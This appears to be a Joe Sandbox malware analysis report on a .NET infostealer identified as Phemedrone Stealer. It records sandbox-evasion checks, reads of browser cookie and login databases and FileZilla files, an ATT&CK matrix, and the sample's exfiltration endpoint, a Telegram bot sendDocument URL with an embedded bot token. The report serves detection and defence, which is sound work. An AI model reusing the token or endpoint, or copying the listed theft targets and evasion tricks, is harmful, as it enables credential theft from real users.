Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4460
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6612
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5444
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4024
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1864
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3580
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1424
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5300
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5728
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2704
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6780
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4424
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3128
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1400
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5276
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6564
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2684
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 528
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1820
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5692
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7096
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2240
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6980
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 504
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2656
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4208
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1788
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 924
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4800
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6952
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6164
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2636
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4524
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6556
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6504
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3484
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2188
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2616
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6984
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3512
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1324
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4764
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2172
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4324
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 444
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe	Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E9794A push ebx; retf 0_2_00007FF848E9796A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E97C5E push eax; retf 0_2_00007FF848E97C6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E97C50 pushad ; retf 0_2_00007FF848E97C5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848EAE715 pushad ; retf 0_2_00007FF848EAE778
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1E393280000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1E3ACC90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\file.exe TID: 6276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6552	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6276	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000
Source: file.exe, 00000000.00000002.3892940701.000001E3AD46E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe	Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe	Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, Mydihutelan.cs	Reference to suspicious API methods: LoadLibrary(Ujybunukycafemijo)
Source: file.exe, Mydihutelan.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Usinenerusasikyha), typeof(T))
Source: file.exe, Ykokoninaco.cs	Reference to suspicious API methods: Ugecolehuji.Kernel32.OpenProcess(Ugecolehuji.Ronejohonelokyc.DuplicateHandle, bInheritHandle: true, (uint)Sikebyjogudadodix)
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Remote Access Functionality

Source: Yara match	File source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	123 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

      SourceDetectionScannerLabelLink
      file.exe66%ReversingLabsByteCode-MSIL.Spyware.PhemedroneStealer
      file.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
      https://www.ecosia.org/newtab/0%URL Reputationsafe
      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      get.geojs.io
      104.26.0.100
      truefalse
        unknown
        api.telegram.org
        149.154.167.220
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocumentfalse
            unknown
            https://get.geojs.io/v1/ip/geo.jsonfalse
              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/ | file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/freakcodingspot | file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/TheDyer | file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://get.geH | file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://get.geojs.io | file.exe, 00000000.00000002.3890665414.000001E394E82000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.tele | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://get.geojs.io | file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://api.telegram.org | file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/webster480 | file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.26.0.100 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545748
                                      Start date and time:2024-10-30 22:56:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 18s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
Number of new started processes analysed:4
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal88.troj.spyw.evad.winEXE@1/1@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 9
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: file.exe
                                      No simulations
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer
149.154.167.220 | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | malicious | AgentTesla
149.154.167.220 | Factura Honorarios 2024-10.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | Fernissagerne.exe | malicious | Snake Keylogger
